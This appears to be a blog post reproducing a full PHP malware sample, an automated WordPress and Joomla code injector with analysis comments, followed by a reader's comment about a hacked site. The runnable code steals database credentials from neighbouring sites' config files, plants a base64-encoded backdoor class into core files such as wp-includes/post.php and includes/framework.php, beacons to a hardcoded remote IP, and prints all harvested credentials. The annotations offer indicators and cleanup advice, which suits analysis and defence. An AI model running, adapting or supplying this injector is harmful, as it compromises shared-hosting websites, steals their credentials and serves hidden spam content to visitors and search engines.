WordPress + Joomla hacking code

This is an automated Joomla / WordPress code injector.
It finds files and injects PHP code into them.

<?php

// Configuration of the injector (malware sample, annotated for analysis and cleanup).
// ONLY_SEARCH   - when true, the block guarded by `if (!ONLY_SEARCH)` is skipped, so nothing is modified.
// MAX_LEVEL     - how many directory levels above the document root are used as search roots.
// MAX_ITERATION - cap on the number of entries SearchFile() reads from one directory.
// P             - the web server's document root; all search roots are derived from it.
// URL           - remote endpoint used by the snippet pingCode() generates. The host and
//                 path in it are network indicators for this sample (outbound HTTP from PHP).
DEFINE('ONLY_SEARCH', false);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 500);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
DEFINE('URL', 'http://78.24.222.200/use.php');

// Directory names SearchFile() will not descend into.
$GLOBALS['stopkey'] = Array('upload', 'uploads', 'img', 'administrator', 'admin', 'bin', 'cache', 'cli', 'components', 'includes', 'language', 'layouts', 'libraries', 'logs', 'media',	'modules', 'plugins', 'tmp', 'upgrade', 'engine', 'templates', 'template', 'images', 'css', 'js', 'image', 'file', 'files', 'wp-admin', 'wp-content', 'wp-includes');

// $GLOBALS['_'] - config files found by SearchFile(), keyed by full path.
// $dirs         - search roots, filled by the loop over MAX_LEVEL further down.
// $domain       - one record per parsed config file (DB settings + site path), filled by checkDomain().
$GLOBALS['_'] = Array();
$dirs = Array();
$domain = Array();

// Per CMS: the config file name to look for, a short CMS tag ('jm' = Joomla, 'wp' = WordPress),
// and a marker string that must occur in the file before checkDomain() parses it.
$search = Array(
	Array('file' => 'configuration.php', 'cms' => 'jm', '_key' => 'JConfig'), 
	Array('file' => 'wp-config.php', 'cms' => 'wp', '_key' => '$table_prefix'),
);

// The $BASE_64 assignment that follows holds the base64-encoded template of the code that
// gets written into the CMS files. Decoded, it starts with `class Cache_Class` and ends with
// `Cache_Class::create();`; getCode() fills in its {$TABLE}, {$PASSWORD}, {$CMS}, {$HOST},
// {$USER}, {$DB_PASSWORD} and {$NAME} placeholders. The decoded class appears to accept
// POST requests carrying `password` and `action` fields and to append stored markup to
// rendered pages, so both the string `Cache_Class` in core files and such POST requests
// in access logs are worth searching for on a suspected host.

$BASE_64 = 'Y2xhc3MgQ2FjaGVfQ2xhc3MKCXsKCQlwcml2YXRlICR0YWJsZSA9ICd7JFRBQkxFfSc7CgkJcHVibGljICRzdGFydF9jYWNoZSA9IGZhbHNlOwoJCXByaXZhdGUgJGNtcyA9ICd7JENNU30nOwoJCXByaXZhdGUgJGNhbm9uaWNhbCA9ICcnOwoJCQoJCXByaXZhdGUgJGRiX2hvc3QgPSAneyRIT1NUfSc7CgkJcHJpdmF0ZSAkZGJfdXNlciA9ICd7JFVTRVJ9JzsKCQlwcml2YXRlICRkYl9wYXNzd29yZCA9ICd7JERCX1BBU1NXT1JEfSc7CgkJcHJpdmF0ZSAkZGJfbmFtZSA9ICd7JE5BTUV9JzsKCQkKCQlwcml2YXRlIGZ1bmN0aW9uIHVybF9ub3coKQoJCQl7CgkJCQlyZXR1cm4gJ2h0dHA6Ly8nIC4gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gdXJsZGVjb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKTsKCQkJfQoJCQoJCXByaXZhdGUgZnVuY3Rpb24gdXJsX2NyZWF0ZSgkd29yayA9IDEpCgkJCXsKCQkJCUBteXNxbF9xdWVyeSgnIElOU0VSVCBJTlRPIGAnLiR0aGlzLT50YWJsZS4nYCBTRVQgYHdvcmtgID0gIicuJHdvcmsuJyIsIGB1cmxgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkdGhpcyAtPiB1cmxfbm93KCkpLiciCgkJCQlPTiBEVVBMSUNBVEUgS0VZIFVQREFURSBgd29ya2AgPSAiJy4kd29yay4nIgoJCQkJJyk7CgkJCX0KCQkKCQlwdWJsaWMgZnVuY3Rpb24gdXJsX2NvZGUoKQoJCQl7CgkJCQlpZiAoJHF1ZXJ5ID0gQG15c3FsX3F1ZXJ5KCdTRUxFQ1QgYGNvZGVgIEZST00gYCcuJHRoaXMtPnRhYmxlLidgIFdIRVJFIGB1cmxgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZygkdGhpcyAtPiB1cmxfbm93KCkpLiciJykpCgkJCQkJewoJCQkJCQlyZXR1cm4gc3RyaXBzbGFzaGVzKEBteXNxbF9yZXN1bHQoJHF1ZXJ5LCAwKSk7CgkJCQkJfQoJCQkJCgkJCQlyZXR1cm4gJyc7CgkJCX0KCQkKCQlwcml2YXRlIGZ1bmN0aW9uIHVybF9leGlzdCgpCgkJCXsKCQkJCWlmICgkcXVlcnkgPSBAbXlzcWxfcXVlcnkoJ1NFTEVDVCBjb3VudCgqKSBGUk9NIGAnLiR0aGlzLT50YWJsZS4nYCBXSEVSRSBgdXJsYCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoICR0aGlzLT51cmxfbm93KCkgKS4nIicpKQoJCQkJCXsKCQkJCQkJaWYgKEBteXNxbF9yZXN1bHQoJHF1ZXJ5LCAwKSA9PSAnMCcpCgkJCQkJCQl7CgkJCQkJCQkJcmV0dXJuIGZhbHNlOwoJCQkJCQkJfQoJCQkJCQllbHNlCgkJCQkJCQl7CgkJCQkJCQkJcmV0dXJuIHRydWU7CgkJCQkJCQl9CgkJCQkJfQoJCQkJCQoJCQkJcmV0dXJuIHRydWU7CgkJCX0KCQkKCQlwcml2YXRlIGZ1bmN0aW9uIGdldF9jb2RlKCkKCQkJewoJCQkJJG9wdGlvbnNbJ2h0dHAnXSA9IGFycmF5KAoJCQkJCSdtZXRob2QnID0+ICJHRVQiLAoJCQkJCSdmb2xsb3dfbG9jYXRpb24nID0+IDAKCQkJCSk7CgkJCQkKCQkJCSRjb250ZXh0ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKCRvcHRpb25zKTsKCQkJCSRnZXQgPSBmaWxlX2dldF9jb250ZW50cygkdGhpcy0+dXJsX25vdygpLCBOVUxMLCAkY29u
dGV4dCk7CgkJCQkKCQkJCWlmIChwcmVnX21hdGNoKCchPGxpbmtbXj5dKnJlbD1bXCciXWNhbm9uaWNhbFtcJyJdW14+XSpocmVmPVtcJyJdKFteXCciXSspW1wnIl1bXj5dKj4haXMnLCAkZ2V0LCAkXykpCgkJCQkJewoJCQkJCQkkdGhpcyAtPiBjYW5vbmljYWwgPSBodG1sX2VudGl0eV9kZWNvZGUodXJsZGVjb2RlKCRfWzFdKSk7CgkJCQkJfQoJCQkJZWxzZWlmIChwcmVnX21hdGNoKCchPGxpbmtbXj5dKmhyZWY9W1wnIl0oW15cJyJdKylbXCciXVtePl0qcmVsPVtcJyJdY2Fub25pY2FsW1wnIl1bXj5dKj4haXMnLCAkZ2V0LCAkXykpCgkJCQkJewoJCQkJCQkkdGhpcyAtPiBjYW5vbmljYWwgPSBodG1sX2VudGl0eV9kZWNvZGUodXJsZGVjb2RlKCRfWzFdKSk7CgkJCQkJfQoKCQkJCWlmICghZW1wdHkoJGh0dHBfcmVzcG9uc2VfaGVhZGVyKSkKCQkJCQl7CgkJCQkJCXNzY2FuZigkaHR0cF9yZXNwb25zZV9oZWFkZXJbMF0sICdIVFRQLyUqZC4lKmQgJWQnLCAkY29kZSk7CgkJCQkJCWlmIChpc19udW1lcmljKCRjb2RlKSkgcmV0dXJuICRjb2RlOwoJCQkJCX0KCQkJCQoJCQkJcmV0dXJuIDIwMDsKCQkJfQoJCQkKCQlwdWJsaWMgZnVuY3Rpb24gcHJlX2NhY2hlKCkKCQkJewoJCQkJaWYgKGlzc2V0KCRfUE9TVFsnYWN0aW9uJ10pKQoJCQkJCXsKCQkJCQkJc3dpdGNoICgkX1BPU1RbJ2FjdGlvbiddKQoJCQkJCQkJewoJCQkJCQkJCWNhc2UgJ2dldF9hbGxfbGlua3MnOwoJCQkJCQkJCQloZWFkZXIoIkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbiIpOwoJCQkJCQkJCQlpZiAoJHF1ZXJ5ICA9IEBteXNxbF9xdWVyeSgnU0VMRUNUICogRlJPTSBgJy4kdGhpcy0+dGFibGUuJ2AgV0hFUkUgYHdvcmtgID0gIjEiIE9SREVSIEJZIGB1cmxgIERFU0MgTElNSVQgMCwgMjUwMCcpKQoJCQkJCQkJCQkJewoJCQkJCQkJCQkJCXdoaWxlICgkZGF0YSA9IEBteXNxbF9mZXRjaF9hc3NvYygkcXVlcnkpKSAKCQkJCQkJCQkJCQkJewoJCQkJCQkJCQkJCQkJZWNobyAnPGU+PHVybD4nIC4gJGRhdGFbJ3VybCddIC4gJzwvdXJsPjxjb2RlPicgLiAkZGF0YVsnY29kZSddIC4gJzwvY29kZT48aWQ+JyAuICRkYXRhWydJRCddIC4gJzwvaWQ+PC9lPicgLiAiXHJcbiI7CgkJCQkJCQkJCQkJCX0KCQkJCQkJCQkJCX0KCQkJCQkJCQlicmVhazsKCQkJCQkJCQkKCQkJCQkJCQljYXNlICdzZXRfbGlua3MnOwoJCQkJCQkJCQlpZiAoaXNzZXQoJF9QT1NUWydkYXRhJ10pKQoJCQkJCQkJCQkJewoJCQkJCQkJCQkJCWlmIChteXNxbF9xdWVyeSgnVVBEQVRFIGAnLiR0aGlzLT50YWJsZS4nYCBTRVQgY29kZSA9ICInIC4gbXlzcWxfZXNjYXBlX3N0cmluZygkX1BPU1RbJ2RhdGEnXSkgLiAnIiBXSEVSRSBjb2RlID0gIiIgQU5EIGB3b3JrYCA9ICIxIiBMSU1JVCAxJykpCgkJCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQkJCWVjaG8gJ3RydWUnOwoJCQkJCQkJCQkJCQl9CgkJCQkJCQkJCQl9CgkJCQkJCQkJYnJlYWs7CgkJCQkJCQkJCgkJCQkJCQkJY2FzZSAnc2V0X2lkX2xp
bmtzJzsKCQkJCQkJCQkJaWYgKGlzc2V0KCRfUE9TVFsnZGF0YSddKSkKCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQlpZiAoQG15c3FsX3F1ZXJ5KCdVUERBVEUgYCcuJHRoaXMtPnRhYmxlLidgIFNFVCBjb2RlID0gIicgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRfUE9TVFsnZGF0YSddKSAuICciIFdIRVJFIGBJRGAgPSAiJyAuIG15c3FsX2VzY2FwZV9zdHJpbmcoJF9QT1NUWydpZCddKSAuICciJykpCgkJCQkJCQkJCQkJCXsKCQkJCQkJCQkJCQkJCWVjaG8gJ3RydWUnOwoJCQkJCQkJCQkJCQl9CgkJCQkJCQkJCQl9CgkJCQkJCQkJYnJlYWs7CgkJCQkJCQkJCgkJCQkJCQkJZGVmYXVsdDogZGllKCdlcnJvciBhY3Rpb24nKTsKCQkJCQkJCX0KCQkJCQkJZXhpdDsKCQkJCQl9CgkJCX0KCQkKCQlzdGF0aWMgZnVuY3Rpb24gd29yZHByZXNzX2NhY2hlKCRjb250ZW50KQoJCQl7CgkJCQkkR0xPQkFMU1snX2NhY2hlXyddIC0+IGNyZWF0ZV9uZXdfcGFnZSgpOwoJCQkJJGNvbnRlbnQgPSAkY29udGVudCAuICRHTE9CQUxTWydnbG9iYWxfY29kZSddOwoJCQkJJEdMT0JBTFNbJ2dsb2JhbF9jb2RlJ10gPSAnJzsKCQkJCXJldHVybiAkY29udGVudCA7CgkJCX0KCQkKCQlwdWJsaWMgZnVuY3Rpb24gY3JlYXRlX25ld19wYWdlKCkKCQkJewoJCQkJJEdMT0JBTFNbJ19jYWNoZV8nXSAtPiBkYl9jb25uZWN0KCk7CgkJCQlpZiAoIChzdHJwb3Moc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLCAnZ29vZ2xlYm90JykgIT09IGZhbHNlKSAmJighJHRoaXMgLT4gdXJsX2V4aXN0KCkpKQoJCQkJCXsKCQkJCQkJJHRoaXMgLT4gdXJsX2NyZWF0ZSggMCApOwoJCQkJCQkKCQkJCQkJaWYgKCgkdGhpcyAtPiBnZXRfY29kZSgpID09IDIwMCkgJiYgKCAoJHRoaXMgLT4gY2Fub25pY2FsID09ICcnKSB8fCAoICR0aGlzIC0+IGNhbm9uaWNhbCA9PSAkdGhpcy0+dXJsX25vdygpICkgKSkKCQkJCQkJCXsKCQkJCQkJCQkkdGhpcyAtPiB1cmxfY3JlYXRlKCk7CgkJCQkJCQl9CgkJCQkJfQoJCQl9CgkJCgkJc3RhdGljIGZ1bmN0aW9uIHVwZGF0ZV9jb250ZW50KCRjb250ZW50LCAkY29kZSkKCQkJewoJCQkJaWYgKCFlbXB0eSgkY29kZSkpCgkJCQkJewoJCQkJCQlpZiAocHJlZ19tYXRjaCgnITxib2R5W14+XSo+IWlzJywgJGNvbnRlbnQpKQoJCQkJCQkJewoJCQkJCQkJCSRjb250ZW50ID0gcHJlZ19yZXBsYWNlKCchKDxib2R5W14+XSo+KSFzaScsICdcMScgLiAkY29kZSwgJGNvbnRlbnQpOwoJCQkJCQkJfQoJCQkJCQllbHNlaWYgKHByZWdfbWF0Y2goJyE8L2JvZHk+IXNpJywgJGNvbnRlbnQpKQoJCQkJCQkJewoJCQkJCQkJCSRjb250ZW50ID0gcHJlZ19yZXBsYWNlKCchPC9ib2R5PiFzaScsICRjb2RlIC4gJzwvYm9keT4nLCAkY29udGVudCk7CgkJCQkJCQl9CgkJCQkJCWVsc2VpZiAocHJlZ19tYXRjaCgnITwvaHRtbD4hc2knLCAkY29udGVudCkpCgkJCQkJCQl7CgkJCQkJCQkJJGNvbnRlbnQgPSBwcmVnX3JlcGxhY2UoJyE8L2h0bWw+
IXNpJywgJGNvZGUgLiAnPC9odG1sPicsICRjb250ZW50KTsKCQkJCQkJCX0KCQkJCQkJZWxzZQoJCQkJCQkJewoJCQkJCQkJCSRjb250ZW50IC49ICRjb2RlOwoJCQkJCQkJfQoJCQkJCX0KCQkJCQkKCQkJCXJldHVybiAkY29udGVudDsKCQkJfQoJCQoJCXN0YXRpYyBmdW5jdGlvbiBfY2FjaGUoJGNvbnRlbnQpCgkJCXsKCQkJCSRHTE9CQUxTWydfY2FjaGVfJ10gLT4gY3JlYXRlX25ld19wYWdlKCk7CgkJCQlyZXR1cm4gQ2FjaGVfQ2xhc3M6OnVwZGF0ZV9jb250ZW50KCRjb250ZW50LCAkR0xPQkFMU1snZ2xvYmFsX2NvZGUnXSkgOwoJCQl9CgkJCgkJc3RhdGljIGZ1bmN0aW9uIGRpc2FibGVfY2FjaGUoKQoJCQl7CgkJCQkgQG9iX2VuZF9mbHVzaCgpOwoJCQl9CgkJCgkJcHJpdmF0ZSBmdW5jdGlvbiBkYl9jb25uZWN0KCkKCQkJewoJCQkJQG15c3FsX2Nvbm5lY3QoJHRoaXMgLT4gZGJfaG9zdCwgJHRoaXMgLT4gZGJfdXNlciwgJHRoaXMgLT4gZGJfcGFzc3dvcmQpOwoJCQkJQG15c3FsX3NlbGVjdF9kYiggJHRoaXMgLT4gZGJfbmFtZSApOwoJCQl9CgkJCgkJcHVibGljIGZ1bmN0aW9uIGNyZWF0ZV9jYWNoZSgpCgkJCXsKCQkJCSR0aGlzIC0+IHN0YXJ0X2NhY2hlID0gQG9iX3N0YXJ0KCBBcnJheSgkdGhpcywgJ19jYWNoZScpICk7CgkJCX0KCQkJCgkJc3RhdGljIGZ1bmN0aW9uIGNyZWF0ZSgpCgkJCXsKCQkJCWlmICggc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAnd3AtYWRtaW4nKSAhPT0gRkFMU0UgKSByZXR1cm4gOwoJCQkJJEdMT0JBTFNbJ19jYWNoZV8nXSA9IG5ldyBDYWNoZV9DbGFzcygpOwoJCQkJaWYgKCRHTE9CQUxTWydfY2FjaGVfJ10gLT4gY21zID09ICdqbScpICRHTE9CQUxTWydfY2FjaGVfJ10gLT4gZGJfY29ubmVjdCgpOwoJCQkJaWYgKCRfUE9TVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSAkR0xPQkFMU1snX2NhY2hlXyddIC0+IHByZV9jYWNoZSgpOwoJCQkJJEdMT0JBTFNbJ2dsb2JhbF9jb2RlJ10gPSAkR0xPQkFMU1snX2NhY2hlXyddIC0+IHVybF9jb2RlKCk7CgkJCQkJCQoJCQkJc3dpdGNoICgkR0xPQkFMU1snX2NhY2hlXyddIC0+IGNtcykKCQkJCQl7CgkJCQkJCWNhc2UgJ3dwJzsKCQkJCQkJCWFkZF9maWx0ZXIoJ3RoZV9jb250ZW50JywgQXJyYXkoJEdMT0JBTFNbJ19jYWNoZV8nXSwgJ3dvcmRwcmVzc19jYWNoZScpKTsKCQkJCQkJYnJlYWs7CgkJCQkJCQkJCgkJCQkJCWRlZmF1bHQ6ICRHTE9CQUxTWydfY2FjaGVfJ10gLT4gY3JlYXRlX2NhY2hlKCk7CgkJCQkJfQkJCQkJCQoJCQl9CgkJCQoJfQoKQ2FjaGVfQ2xhc3M6OmNyZWF0ZSgpOw==';

// Small regex helper: runs $regexp against $content and returns capture group $index
// of the first match, or false when the pattern does not match.
// checkDomain() uses it to pull database settings out of CMS config files.
function Match($regexp, $content, $index = 1)
	{
		if (preg_match($regexp, $content, $result))
			{
				return $result[$index];
			}
		return false;
	}

// Recursively walks $path looking for the config file names listed in $search.
// Every hit is recorded in $GLOBALS['_'] as [cms tag, full path], keyed by full path.
// Errors from opendir()/readdir() are suppressed with @, so unreadable directories are
// skipped silently. Because the walk depends only on what the PHP process can read,
// config files of neighbouring sites are found when file permissions allow it.
function SearchFile($search, $path)
	{
		if ($dir = @opendir($path))
			{
				$i = 0;
				while (($filename = @readdir($dir)) !== false)
					{
						// Stop reading this directory once more than MAX_ITERATION entries were seen.
						if ($i > MAX_ITERATION) break;
						$i++;
						if ($filename != '.' && $filename != '..')
							{
								// Descend into sub-directories unless their name is on the stop list.
								if (is_dir($path . '/' . $filename) && !in_array($filename, $GLOBALS['stopkey']))
									{
										SearchFile($search, $path . '/' . $filename);
									}
								else
									{
										// Case-insensitive comparison of the entry name with each wanted config file name.
										foreach ($search as $_)
											{
												if (strtolower($filename) == strtolower($_['file']))
													{
														$GLOBALS['_'][$path . '/' . $filename] = Array($_['cms'], $path . '/' . $filename);
													}
											}
									}
							}
					}
			}
	}

// Returns a string of PHP source (it is not executed here) delimited by the markers
// //PING and //ENDPING. CreateJoomCode()/CreateWpCode() place it in front of the
// Cache_Class code inside the modified CMS file.
//
// What the generated snippet does when the modified file is loaded:
//   - requests URL with `p=<password>` and `url=<HTTP_HOST>` in the query string, i.e. it
//     reports the site's host name and the per-site password to the remote endpoint;
//   - if that request returns non-empty content, it rewrites the file it lives in and
//     removes everything between //PING and //ENDPING.
//
// Analysis notes: the beacon is a one-off outbound HTTP request from the web server, so
// egress logs / firewall records for the URL host are the place to look. After a
// successful beacon the markers are gone, so their absence does not show a file is clean;
// search for `Cache_Class` as well.
function pingCode($password)
	{
		return '//PING
				if (@file_get_contents(\''.URL.'?p='.$password.'&url=\' . $_SERVER[\'HTTP_HOST\']))
					{
						if ($file = @file_get_contents(__FILE__))
							{
								$file = preg_replace(\'!//PING.*//ENDPING!s\', \'\', $file);
								@file_put_contents(__FILE__, $file);
							}
					}
				//ENDPING
		';
	}
	
// Builds the code that will be written into a CMS file: decodes the global $BASE_64
// template and substitutes its placeholders. Returns the resulting source text, or the
// falsy result of base64_decode() if decoding fails.
//
// $password - value stored in the template's {$PASSWORD} placeholder.
// $data     - record produced by checkDomain(); 'prefix', 'host', 'login', 'password'
//             and 'name' are read here.
// $cms      - CMS tag ('jm' or 'wp') stored in {$CMS}.
//
// Analysis notes: the table name is always `<table prefix>cache_module_content`, and the
// site's database host, user, password and name end up in clear text inside the modified
// core file. Treat those credentials as exposed when such a file is found.
function getCode($password, $data, $cms)
	{
		global $BASE_64;
		$code =  '';
		
		if ($code = base64_decode($BASE_64))
			{
				$code = str_replace('{$TABLE}', $data['prefix'] . 'cache_module_content', $code);
				$code = str_replace('{$PASSWORD}', $password, $code);
				$code = str_replace('{$CMS}', $cms, $code);
				
				$code = str_replace('{$HOST}', $data['host'], $code);
				$code = str_replace('{$USER}', $data['login'], $code);
				$code = str_replace('{$DB_PASSWORD}', $data['password'], $code);
				$code = str_replace('{$NAME}', $data['name'], $code);
			}
		
		return $code;
	}
	
// Joomla branch of the injector. Using the database settings in $data it creates the
// table `<prefix>cache_module_content` and, only if that query succeeds, modifies
// `<site path>/includes/framework.php`.
//
// Indicators and cleanup notes for an affected Joomla site:
//   - a table named `<prefix>cache_module_content` with columns url, code, work, ID;
//   - `includes/framework.php` containing the string `Cache_Class` (the script itself
//     uses that string to skip files it has already modified);
//   - the fourth argument of str_replace() is an output counter, not a limit, so every
//     `<?php` occurrence in the file receives a copy of the code. Restore the file from a
//     known-good copy of the same Joomla release instead of deleting a single block;
//   - the database credentials read from configuration.php are embedded in the modified
//     file, so rotate them after cleanup.
function CreateJoomCode($data)
	{
		// Per-site password: MD5 of a fixed prefix plus rand(100, 200). The value space is
		// tiny, so it offers no real protection for the POST interface of the injected code.
		$password = md5('_Password_' . rand(100, 200));
		$code = pingCode($password) . "\n" . getCode($password, $data, 'jm');
		
		$sql = 'CREATE TABLE IF NOT EXISTS `'.$data['prefix'].'cache_module_content` (
					  `url` varchar(255) NOT NULL,
					  `code` text NOT NULL,
					  `work` int(11) NOT NULL,
					  `ID` int(11) NOT NULL AUTO_INCREMENT,
					  PRIMARY KEY (`ID`),
					  UNIQUE KEY `url` (`url`),
					  KEY `work` (`work`)
					) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;';
					
		// Connection errors are suppressed; a failed connection simply makes the query below fail.
		@mysql_connect($data['host'], $data['login'], $data['password']);
		@mysql_select_db($data['name']);
		
			if (@mysql_query($sql))
				{
					$_file = $data['path'] . '/includes/framework.php';
					
					if (file_exists($_file))
						{
							$file_content = file_get_contents( $_file );
							// Skip files that already contain the injected class.
							if (strpos($file_content, 'Cache_Class') === false)
								{
									$count = 1;
									$file_content = str_replace('<?php', '<?php' . "\n" . $code, $file_content, $count);
									file_put_contents($_file, $file_content);
								}
						}
					
				}
				
		@mysql_close();
	}
	
	
// WordPress branch of the injector. If `<site path>/wp-includes/post.php` exists and does
// not yet contain `Cache_Class`, it creates the table `<prefix>cache_module_content` and,
// when that query succeeds, writes the generated code in front of every occurrence of
// `function get_attached_file` in post.php.
//
// Indicators and cleanup notes for an affected WordPress site:
//   - `wp-includes/post.php` differs from the release copy and contains `Cache_Class`
//     (a core-file checksum comparison will flag it);
//   - a table named `<prefix>cache_module_content` with columns url, code, work, ID;
//   - the database credentials read from wp-config.php are embedded in the modified file,
//     so rotate them after restoring post.php from a known-good copy.
function CreateWpCode($data)
	{
		// Per-site password: MD5 of a fixed prefix plus rand(100, 200). The value space is
		// tiny, so it offers no real protection for the POST interface of the injected code.
		$password = md5('_Password_' . rand(100, 200));
		$code = pingCode($password) . "\n" . getCode($password, $data, 'wp');
		
		@mysql_connect($data['host'], $data['login'], $data['password']);
		@mysql_select_db($data['name']);

		if (file_exists($data['path'] . '/wp-includes/post.php'))
			{
				$file = file_get_contents($data['path'] . '/wp-includes/post.php');
				
				// Skip files that already contain the injected class.
				if (strpos($file, 'Cache_Class') === FALSE)
					{
						$sql = 'CREATE TABLE IF NOT EXISTS `'.$data['prefix'].'cache_module_content` (
									  `url` varchar(255) NOT NULL,
									  `code` text NOT NULL,
									  `work` int(11) NOT NULL,
									  `ID` int(11) NOT NULL AUTO_INCREMENT,
									  PRIMARY KEY (`ID`),
									  UNIQUE KEY `url` (`url`),
									  KEY `work` (`work`)
									) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;';
							
						// The file is only touched when the table could be created.
						if (@mysql_query($sql))
							{
								$file = str_replace('function get_attached_file', $code . "\n\n".'function get_attached_file', $file);
								file_put_contents($data['path'] . '/wp-includes/post.php', $file);
							}
					}
				
			}

		@mysql_close();
		
	}
	
	
// Reads one CMS config file and, if it contains the marker string registered for its CMS
// type in the global $search list, extracts the database settings with regular
// expressions and appends one record to $domain (passed by reference).
//
// $configFile - full path of the config file found by SearchFile().
// $type       - CMS tag stored with that path ('wp' or 'jm').
// $domain     - list receiving Array(host, name, login, password, prefix, path, type);
//               'path' is $configFile with its last path component removed.
//
// Each field is false when its pattern does not match (see Match()). Nothing is returned.
// Analysis note: this is the point where database credentials of every readable site are
// collected; config files readable by other accounts' PHP processes are what makes the
// cross-site reach possible.
function checkDomain($configFile, $type, &$domain)
	{
		global $search;
		
		if ($file = file_get_contents($configFile))
			{
				foreach ($search as $_)
					{
						if ($type == $_['cms'])
							{
								// Only parse files that contain the CMS-specific marker.
								if (strpos($file, $_['_key']) !== false)
									{
										switch ($type)
											{
												// WordPress: values of the DB_* define() calls and $table_prefix.
												case 'wp';
													$db_name = Match('!DB_NAME[\'\s\,]+\'([^\']*)\'\s*\)!s', $file);
													$db_login = Match('!DB_USER[\'\s\,]+\'([^\']*)\'\s*\)!s', $file);
													$db_password = Match('!DB_PASSWORD[\'\s\,]+\'([^\']*)\'\s*\)!s', $file);
													$db_host = Match('!DB_HOST[\'\s\,]+\'([^\']*)\'\s*\)!s', $file);
													$db_prefix = Match('!\$table_prefix[\s=]*\'([^\']*)\'!s', $file);
												break;
												
												// Joomla: single-quoted values assigned to $db, $user, $password, $host, $dbprefix.
												case 'jm';
													$db_name = Match('!\$db\s*=\s*\'([^\']*)\'!s', $file);
													$db_login = Match('!\$user\s*=\s*\'([^\']*)\'!s', $file);
													$db_password = Match('!\$password\s*=\s*\'([^\']*)\'!s', $file);
													$db_host = Match('!\$host\s*=\s*\'([^\']*)\'!s', $file);
													$db_prefix = Match('!\$dbprefix\s*=\s*\'([^\']*)\'!s', $file);
												break;
											}
											
										$domain[] = Array('host' => $db_host, 'name' => $db_name, 'login' => $db_login, 'password' => $db_password, 'prefix' => $db_prefix, 'path' => Match('!^(.*)/[^/]*$!s', $configFile), 'type' => $type);
										return ;
											
									}
							}
					}
			}
			
	}
	
// Returns the full paths of the immediate sub-directories of $path (no recursion),
// or false when $path cannot be opened. Errors are suppressed with @.
function getDirList($path)
	{
		if ($dir = @opendir($path))
			{
				$result = Array();
				
				while (($filename = @readdir($dir)) !== false)
					{
						if ($filename != '.' && $filename != '..' && is_dir($path . '/' . $filename))
							$result[] = $path . '/' . $filename;
					}
				
				return $result;
			}
			
		return false;
	}

// Step 1: build the list of search roots - the directories 1..MAX_LEVEL levels above the
// document root. On shared hosting these parents typically contain other sites as well,
// which is why one compromised site can lead to changes in its neighbours.
for ($i = 0; $i<MAX_LEVEL; $i++)
	{
		$dirs[realpath(P . str_repeat('/../', $i + 1))] = realpath(P . str_repeat('/../', $i + 1));
	}
	
// Step 2: search every sub-directory of each root for CMS config files.
// getDirList() returns false for unreadable roots; the resulting warning is suppressed.
foreach ($dirs as $dir)
	{
		foreach (@getDirList($dir) as $__)
			{
				@SearchFile($search, $__);
			}
	}

// Step 3: parse each config file found and collect its database settings in $domain.
foreach ($GLOBALS['_'] as $e)
	{
		@checkDomain($e[1], $e[0], $domain);
	}
	
if (!ONLY_SEARCH) {
	// Step 4: modify each discovered site according to its CMS type.
	foreach ($domain as $__)
		{
			switch ($__['type'])
				{
					case 'jm';
						@CreateJoomCode($__);
					break;
					
					case 'wp';
						@CreateWpCode($__);
					break;
				}
		}
		
}

// Step 5: the collected records - including database host, user and password of every
// parsed site - are written to the HTTP response as JSON. Credentials of all listed sites
// must be considered disclosed to whoever requested this script.
echo json_encode($domain);

?>

6 thoughts on “WordPress + Joomla hacking code

  1. Hi, I found your article via Google. My website is hacked and none of the pages can be displayed. I found a file named trust.php in the index folder that contains some code similar to the one you posted in this article.

    I deleted them but the problem is still there, I doubt it has injected code to some PhP files, may I ask what should I do now?

    Many thanks!
